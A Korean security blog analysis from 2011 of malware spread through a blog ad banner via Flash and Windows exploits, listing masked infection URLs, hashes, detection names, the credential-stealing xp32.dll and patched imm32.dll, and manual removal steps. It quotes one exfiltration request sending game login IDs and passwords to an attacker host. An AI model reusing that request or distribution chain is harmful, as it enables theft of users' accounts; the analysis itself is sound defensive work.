본문 바로가기

벌새::Analysis

블로그 광고 배너를 통한 imm32.dll, xp32.dll 악성코드 유포 (2011.8.6)

최근 3주 연속 주말을 이용하여 국내 블로그에 게시되는 특정 광고 배너를 통한 악성코드 유포 행위가 계속되고 있습니다.

해당 유포는 금요일 야간부터 시작되어 월요일 새벽경까지 진단을 우회할 목적으로 2회 이상 변종을 유포하고 있습니다.

 

[악성코드 유포 경로]

h**p://banner.**get.co.kr/ads/adgetS2.js
 ㄴ h**p://bn.weather*.co.kr/kep/meq.html
   ㄴ h**p://bn.weather*.co.kr/kep/q.html
     ㄴ h**p://bn.weather*.co.kr/kep/q.js
     ㄴ h**p://bn.weather*.co.kr/kep/f.html
       ㄴ h**p://bn.weather*.co.kr/kep/main.swf
         ㄴ h**p://www.ha*ba*.co.kr/css/me85.txt :: 암호화
     ㄴ h**p://bn.weather*.co.kr/kep/e.html
       ㄴ h**p://www.ha*ba*.co.kr/css/me85.css
       ㄴ h**p://bn.weather*.co.kr/kep/e.swf
   ㄴ h**p://bn.weather*.co.kr/kep/w.html
     ㄴ h**p://bn.weather*.co.kr/kep/w.js
     ㄴ h**p://www.ha*ba*.co.kr/css/me85.css
   ㄴ h**p://js.tongji.linezing.com/2565864/tongji.js

해당 악성코드 유포에서는 Adobe Flash Player 취약점과 Windows 보안 패치가 제대로 적용되지 않은 사용자가 광고 배너가 포함된 웹 사이트(블로그)에 접속할 경우 자동으로 감염될 가능성이 있습니다.


파일명 보안 제품 진단명
main.swf ALYac 2.0 Exploit.SWF.ShellCode.Gen
e.html AntiVir HTML/Shellcode.Gen
e.swf avast! SWF:Agent-P
w.html AVG Exploit.MsVidCtl


해당 악성코드 유포를 통해 최종적으로 다운로드되는 설치 파일(MD5 : 76f9bd49c775633ab2ebf2c881dfd401)에 대하여 알약(ALYac 2.0) 보안 제품에서는 Trojan.Dropper.OnlineGames.imm 진단명으로 진단되고 있습니다.

해당 설치 파일은 이스트소프트(ESTSoft) 알약 보안 제품의 AYScan.aye(Shell Extension Scanner for Free)로 위장하고 있는 것을 확인할 수 있습니다.

 

[생성 파일 및 진단 정보]

C:\WINDOWS\system32\imm32.dll :: 변경 전 파일 크기 - 110,080 Bytes / 변경 후 파일 크기 - 111,104 Bytes
 - MD5 : 723f61ef9d897cad45022711b11cb13c
 - ALYac 2.0 : Trojan.Patched.Starter.B

C:\WINDOWS\system32\imm32.dllp3D6Jx.tmp :: imm32.dll 백업 파일(정상 파일)
※ 해당 파일은 imm32.dll(6자리 영문+숫자).tmp 형태입니다.

C:\WINDOWS\system32\xp32.dll :: 숨김(H), 시스템(S) 속성
 - MD5 : 624c686ace65cbdb1d60b71409632219
 - ALYac 2.0 : Spyware.OnlineGames.imm

생성된 파일을 살펴보면 imm32.dll(Windows XP IMM32 API Client DLL) 시스템 파일을 패치하여 imm32.dll(6자리 영문+숫자).tmp 파일로 백업을 하며, 악성 imm32.dll 파일은 마이크로소프트(Microsoft) 파일로 정확하게 위장하고 있습니다.

온라인 게임 계정 탈취를 목적으로 한 xp32.dll 악성 파일은 숨김(H) 속성으로 자신을 숨기고 있으며, 이스트소프트(ESTSoft) 알약 보안 제품의 AYSWInfo.dll(System Information for Free) 파일로 위장하고 있습니다.

xp32.dll

해당 파일은 시스템 시작시 안철수연구소(AhnLab) V3, 사이트가드(SiteGuard), 알약(ALYac) 보안 제품의 기능을 무력화하여 진단을 방해합니다.

악성코드 동작 방식은 사용자가 아이온, 다크블러드, 한게임, 넷마블, 피망 등 국내 온라인 게임 로그인시 관련 프로세스에 xp32.dll 파일을 추가하여 계정 정보를 외부로 유출하고 있습니다.

 

[한게임 계정 정보 수집 예시]

GET /hg/post.asp?para=me85&d00=HANGAME&d01=HANGAME&d10=(사용자 ID)&d11=(비밀번호)&d21=&d30= ~(생략)~ =0&d50=&d90=1723 HTTP/1.1
User-Agent: IE6.0
Host: me85.fdsf46546e.com

예를 들어 사용자가 한게임 로그인을 시도할 경우 홍콩(HongKong)에 위치한 180.178.41.107 서버로 계정 정보를 유출하는 것을 확인할 수 있습니다.

해당 악성코드에 감염된 경우 수동으로 문제를 해결하기 원하시는 분은 다음의 절차에 따르시기 바랍니다.(※ 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)

1. C:\WINDOWS\system32\imm32.dll 파일 확장자를 imm32.dll- 형태로 변경합니다.

참고로 악성 imm32.dll 파일 확장자를 변경하면 윈도우 파일 보호(WFP) 기능을 통해 자동으로 정상 imm32.dll 파일이 복원됩니다.

2. C:\WINDOWS\system32\xp32.dll 파일 확장자를 xp32.dll- 형태로 변경합니다.

참고로 xp32.dll 파일은 윈도우 기본값을 통한 윈도우 탐색기에서 보이지 않으므로, 폴더 옵션에서 [보호된 운영 체제 파일 숨기기] 항목 체크 해제 및 [숨김 파일 및 폴더 표시] 항목 체크를 통해 파일을 찾을 수 있습니다.

3. 반드시 시스템 재부팅을 합니다.

4. 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\imm32.dll-
  • C:\WINDOWS\system32\imm32.dll(6자리 영문+숫자).tmp
  • C:\WINDOWS\system32\xp32.dll-

연속적으로 주말마다 유포되는 해당 광고 배너를 달고 있는 블로그는 방문자를 위해서라도 임시로 광고 배너를 제거하는 것이 좋을 것으로 보입니다.